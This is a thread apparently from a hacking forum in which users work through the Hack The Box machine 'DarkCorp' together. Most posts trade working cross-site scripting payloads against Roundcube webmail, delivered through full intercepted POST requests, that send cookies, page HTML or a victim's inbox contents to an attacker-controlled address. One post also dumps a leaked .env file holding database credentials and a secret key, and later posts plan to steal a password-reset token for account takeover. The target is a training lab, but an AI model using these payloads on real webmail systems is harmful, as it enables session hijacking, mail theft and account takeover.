DarkCorp Hack the Box Season 7 (Windows Insane)
by RedBlock - Saturday February 8, 2025 at 03:32 PM
#21
(02-08-2025, 08:29 PM)USBTYPEA Wrote:
(02-08-2025, 08:27 PM)jonklem Wrote:
(02-08-2025, 08:22 PM)0x2034 Wrote:
(02-08-2025, 08:17 PM)jonklem Wrote:
(02-08-2025, 08:13 PM)jsvensson Wrote: why do you say it won't work? on this site they claim it works only they don't specify poc 
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail | Sonar


These work:

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)}))  foo=bar">
  Foo
</body>

You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.  

However, roundcube is set up to use http only cookies and scraping the page doesn't seem to have anything.   It's not as simple as stealing the cookie.

where is content var


When you intercept with burp, change the request to look like this:
name=test&email=test%40test.com&message=%3Cbody+title%3D%22bgcolor%3Dfoo%22+name%3D%22bar+style%3Danimation-name%3Aprogress-bar-stripes+onanimationstart%3Ddocument.body.appendChild%28Object.assign%28document.createElement%28%27script%27%29%2C%7Bsrc%3A%27http%3A%2F%2F10.10.14.144%3A8000%2F%3Fc%3D%27%2Bbtoa%28document.documentElement.innerHTML%29%7D%29%29++foo%3Dbar%22%3E%0D%0A++Foo%0D%0A%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb
in http://drip.htb/index#contact

correct?

POST /contact HTTP/1.1
Host: drip.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
Referer: http://drip.htb/index
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiNWU4NDY2OTc1NDM2ZmNiMWZkZjJlYjRkYWU1MjkzMDg5YzE4MWIyYyJ9.Z6er-A.j_M6m-_XOOhdHukGgmyeLS43hMo
Upgrade-Insecure-Requests: 1a
Priority: u=0, i
name=test&email=toto%40drip.htb&message=test&content=text&recipient=toto%40drip.htb

Modifiy both email by yours
Reply
#22
(02-08-2025, 08:31 PM)Globules Wrote:
(02-08-2025, 08:29 PM)USBTYPEA Wrote:
(02-08-2025, 08:27 PM)jonklem Wrote:
(02-08-2025, 08:22 PM)0x2034 Wrote:
(02-08-2025, 08:17 PM)jonklem Wrote: These work:

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)}))  foo=bar">
  Foo
</body>

You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.  

However, roundcube is set up to use http only cookies and scraping the page doesn't seem to have anything.   It's not as simple as stealing the cookie.

where is content var


When you intercept with burp, change the request to look like this:
name=test&email=test%40test.com&message=%3Cbody+title%3D%22bgcolor%3Dfoo%22+name%3D%22bar+style%3Danimation-name%3Aprogress-bar-stripes+onanimationstart%3Ddocument.body.appendChild%28Object.assign%28document.createElement%28%27script%27%29%2C%7Bsrc%3A%27http%3A%2F%2F10.10.14.144%3A8000%2F%3Fc%3D%27%2Bbtoa%28document.documentElement.innerHTML%29%7D%29%29++foo%3Dbar%22%3E%0D%0A++Foo%0D%0A%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb
in http://drip.htb/index#contact

correct?

POST /contact HTTP/1.1
Host: drip.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
Referer: http://drip.htb/index
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiNWU4NDY2OTc1NDM2ZmNiMWZkZjJlYjRkYWU1MjkzMDg5YzE4MWIyYyJ9.Z6er-A.j_M6m-_XOOhdHukGgmyeLS43hMo
Upgrade-Insecure-Requests: 1a
Priority: u=0, i
name=test&email=toto%40drip.htb&message=test&content=text&recipient=toto%40drip.htb

Modifiy both email by yours

yes. i got it. it gives a very interesting answer.
Reply
#23
(02-08-2025, 08:31 PM)Globules Wrote:
(02-08-2025, 08:29 PM)USBTYPEA Wrote:
(02-08-2025, 08:27 PM)jonklem Wrote:
(02-08-2025, 08:22 PM)0x2034 Wrote:
(02-08-2025, 08:17 PM)jonklem Wrote: These work:

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+document.cookie})) foo=bar">
Foo
</body>

<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=document.body.appendChild(Object.assign(document.createElement('script'),{src:'http://10.10.14.144:8000/?c='+btoa(document.documentElement.innerHTML)}))  foo=bar">
  Foo
</body>

You have to be sure to change the 'content' variable to 'html' as well as the recipient to bcase.  

However, roundcube is set up to use http only cookies and scraping the page doesn't seem to have anything.   It's not as simple as stealing the cookie.

where is content var


When you intercept with burp, change the request to look like this:
name=test&email=test%40test.com&message=%3Cbody+title%3D%22bgcolor%3Dfoo%22+name%3D%22bar+style%3Danimation-name%3Aprogress-bar-stripes+onanimationstart%3Ddocument.body.appendChild%28Object.assign%28document.createElement%28%27script%27%29%2C%7Bsrc%3A%27http%3A%2F%2F10.10.14.144%3A8000%2F%3Fc%3D%27%2Bbtoa%28document.documentElement.innerHTML%29%7D%29%29++foo%3Dbar%22%3E%0D%0A++Foo%0D%0A%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb
in http://drip.htb/index#contact

correct?

POST /contact HTTP/1.1
Host: drip.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
Referer: http://drip.htb/index
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiNWU4NDY2OTc1NDM2ZmNiMWZkZjJlYjRkYWU1MjkzMDg5YzE4MWIyYyJ9.Z6er-A.j_M6m-_XOOhdHukGgmyeLS43hMo
Upgrade-Insecure-Requests: 1a
Priority: u=0, i
name=test&email=toto%40drip.htb&message=test&content=text&recipient=toto%40drip.htb

Modifiy both email by yours


This is the full request i used:


POST /contact HTTP/1.1 Host: drip.htb Content-Length: 410 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://drip.htb Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://drip.htb/index Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: session=eyJfZnJlc2giOmZhbHNlfQ.Z6e_kg.uX8OGbnyKnNcP61u7r-5Ho43JNM Connection: close name=testname&email=testemail&message=%3Cbody+title%3D%22bgcolor%3Dfoo%22+name%3D%22bar+style%3Danimation-name%3Aprogress-bar-stripes+onanimationstart%3Ddocument.body.appendChild%28Object.assign%28document.createElement%28%27script%27%29%2C%7Bsrc%3A%27http%3A%2F%2F10.10.14.144%3A8000%2F%3Fc%3D%27%2Bdocument.cookie%7D%29%29+foo%3Dbar%22%3E%0D%0AFoo%0D%0A%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb

I set my email address to root@ as per another user's suggestion to see the cron jobs.  

I've tried bcase@drip.htb, support@drip.htb, and ebelford@drip.htb and only bcase@ seems to be opening the emails.
Reply
#24
so it looks like this is our way to get some info. someone good in js could craft some code to get emails from bcase inbox
Reply
#25
(02-08-2025, 08:35 PM)jonklem Wrote:
(02-08-2025, 08:31 PM)Globules Wrote:
(02-08-2025, 08:29 PM)USBTYPEA Wrote:
(02-08-2025, 08:27 PM)jonklem Wrote:
(02-08-2025, 08:22 PM)0x2034 Wrote: where is content var


When you intercept with burp, change the request to look like this:
name=test&email=test%40test.com&message=%3Cbody+title%3D%22bgcolor%3Dfoo%22+name%3D%22bar+style%3Danimation-name%3Aprogress-bar-stripes+onanimationstart%3Ddocument.body.appendChild%28Object.assign%28document.createElement%28%27script%27%29%2C%7Bsrc%3A%27http%3A%2F%2F10.10.14.144%3A8000%2F%3Fc%3D%27%2Bbtoa%28document.documentElement.innerHTML%29%7D%29%29++foo%3Dbar%22%3E%0D%0A++Foo%0D%0A%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb
in http://drip.htb/index#contact

correct?

POST /contact HTTP/1.1
Host: drip.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
Referer: http://drip.htb/index
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiNWU4NDY2OTc1NDM2ZmNiMWZkZjJlYjRkYWU1MjkzMDg5YzE4MWIyYyJ9.Z6er-A.j_M6m-_XOOhdHukGgmyeLS43hMo
Upgrade-Insecure-Requests: 1a
Priority: u=0, i
name=test&email=toto%40drip.htb&message=test&content=text&recipient=toto%40drip.htb

Modifiy both email by yours


This is the full request i used:


POST /contact HTTP/1.1 Host: drip.htb Content-Length: 410 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://drip.htb Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://drip.htb/index Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: session=eyJfZnJlc2giOmZhbHNlfQ.Z6e_kg.uX8OGbnyKnNcP61u7r-5Ho43JNM Connection: close name=testname&email=testemail&message=%3Cbody+title%3D%22bgcolor%3Dfoo%22+name%3D%22bar+style%3Danimation-name%3Aprogress-bar-stripes+onanimationstart%3Ddocument.body.appendChild%28Object.assign%28document.createElement%28%27script%27%29%2C%7Bsrc%3A%27http%3A%2F%2F10.10.14.144%3A8000%2F%3Fc%3D%27%2Bdocument.cookie%7D%29%29+foo%3Dbar%22%3E%0D%0AFoo%0D%0A%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb

I set my email address to root@ as per another user's suggestion to see the cron jobs.  

I've tried bcase@drip.htb, support@drip.htb, and ebelford@drip.htb and only bcase@ seems to be opening the emails.

the request in the python server is too long to share, but as far as I can see there is nothing relevant in the text.
Reply
#26
I think we have to craft an XSS payload that will return the contents of

http://mail.drip.htb/?_task=mail&_action...&_extwin=1

for the support engineer user

You're welcome:

POST /contact HTTP/1.1
Host: drip.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 485

name=RooT&email=root@drip.htb&message=%3Cbody%20title%3D%22bgcolor%3Dfoo%22%20name%3D%22bar%20style%3Danimation%2Dname%3Aprogress%2Dbar%2Dstripes%20onanimationstart%3Dfetch%28%27%2F%3F%5Ftask%3Dmail%26%5Faction%3Dshow%26%5Fuid%3D2%26%5Fmbox%3DINBOX%26%5Fextwin%3D1%27%29%2Ethen%28r%3D%3Er%2Etext%28%29%29%2Ethen%28t%3D%3Efetch%28%60http%3A%2F%2F10%2E10%2E14%2EXX%2Fc%3D%24%7Bbtoa%28t%29%7D%60%29%29%20%20foo%3Dbar%22%3E%0A%20%20Foo%0A%3C%2Fbody%3E&content=html&recipient=bcase@drip.htb
Reply
#27
[22:01:07] Starting: dashboard/ [22:01:15] 200 -  796B  - /dashboard/.env [22:01:46] 301 -  169B  - /dashboard/__pycache__  ->  http://drip.darkcorp.htb/dashboard/__pycache__/ [22:02:35] 301 -  169B  - /dashboard/apps  ->  http://drip.darkcorp.htb/dashboard/apps/ [22:04:04] 301 -  169B  - /dashboard/media  ->  http://drip.darkcorp.htb/dashboard/media/ [22:04:36] 200 -  330B  - /dashboard/requirements.txt

http://drip.darkcorp.htb/dashboard/.env

# True for development, False for production DEBUG=False # Flask ENV FLASK_APP=run.py FLASK_ENV=development # If not provided, a random one is generated # SECRET_KEY=<YOUR_SUPER_KEY_HERE> # Used for CDN (in production) # No Slash at the end ASSETS_ROOT=/static/assets # If DB credentials (if NOT provided, or wrong values SQLite is used) DB_ENGINE=postgresql DB_HOST=localhost DB_NAME=dripmail DB_USERNAME=dripmail_dba DB_PASS=2Qa2SsBkQvsc DB_PORT=5432 SQLALCHEMY_DATABASE_URI = 'postgresql://dripmail_dba:2Qa2SsBkQvsc@localhost/dripmail' SQLALCHEMY_TRACK_MODIFICATIONS = True SECRET_KEY = 'GCqtvsJtexx5B7xHNVxVj0y2X0m10jq' MAIL_SERVER = 'drip.htb' MAIL_PORT = 25 MAIL_USE_TLS = False MAIL_USE_SSL = False MAIL_USERNAME = None MAIL_PASSWORD = None MAIL_DEFAULT_SENDER = 'support@drip.htb'

http://drip.darkcorp.htb/dashboard/requirements.txt

flask==2.2.5 Werkzeug==2.3.7 jinja2==3.1.2 flask-login==0.6.2 flask_migrate==4.0.4 WTForms==3.0.1 flask_wtf==1.2.1 flask-sqlalchemy==3.0.5 sqlalchemy==2.0.21 email_validator==2.0.0 flask-restx==1.1.0 python-dotenv==0.19.2 gunicorn==20.1.0 Flask-Minify==0.37 flask-dance==7.0.0 blinker==1.6.2 # flask_mysqldb # psycopg2-binary
Reply
#28
(02-08-2025, 08:50 PM)4yhg5y72jffg820j3f Wrote: I think we have to craft an XSS payload that will return the contents of

http://mail.drip.htb/?_task=mail&_action...&_extwin=1

for the support engineer user

You're welcome:

POST /contact HTTP/1.1
Host: drip.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 485

name=RooT&email=root@drip.htb&message=%3Cbody%20title%3D%22bgcolor%3Dfoo%22%20name%3D%22bar%20style%3Danimation%2Dname%3Aprogress%2Dbar%2Dstripes%20onanimationstart%3Dfetch%28%27%2F%3F%5Ftask%3Dmail%26%5Faction%3Dshow%26%5Fuid%3D2%26%5Fmbox%3DINBOX%26%5Fextwin%3D1%27%29%2Ethen%28r%3D%3Er%2Etext%28%29%29%2Ethen%28t%3D%3Efetch%28%60http%3A%2F%2F10%2E10%2E14%2EXX%2Fc%3D%24%7Bbtoa%28t%29%7D%60%29%29%20%20foo%3Dbar%22%3E%0A%20%20Foo%0A%3C%2Fbody%3E&content=html&recipient=bcase@drip.htb

so next thing is to reset password for bcase and somehow steal token
Reply
#29
You can already read his inbox...
Reply
#30
guys the reset token sent to support@drip.htb we can read his inbox for bcase ATO
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 22 9,270 06-25-2026, 02:15 PM
Last Post: hashxyz
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 7,456 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - VOLEUR.HTB - MEDIUM WINDOWS chain 1 6,652 02-09-2026, 07:07 PM
Last Post: 403Forbidden
  HTB - CERTIFICATE.HTB - HARD WINDOWS chain 0 2,861 02-09-2026, 04:49 PM
Last Post: chain
  Hack the Box FullHouse all 7 flags RedBlock 13 4,810 01-27-2026, 08:30 PM
Last Post: 00xx00



 Users browsing this thread: 1 Guest(s)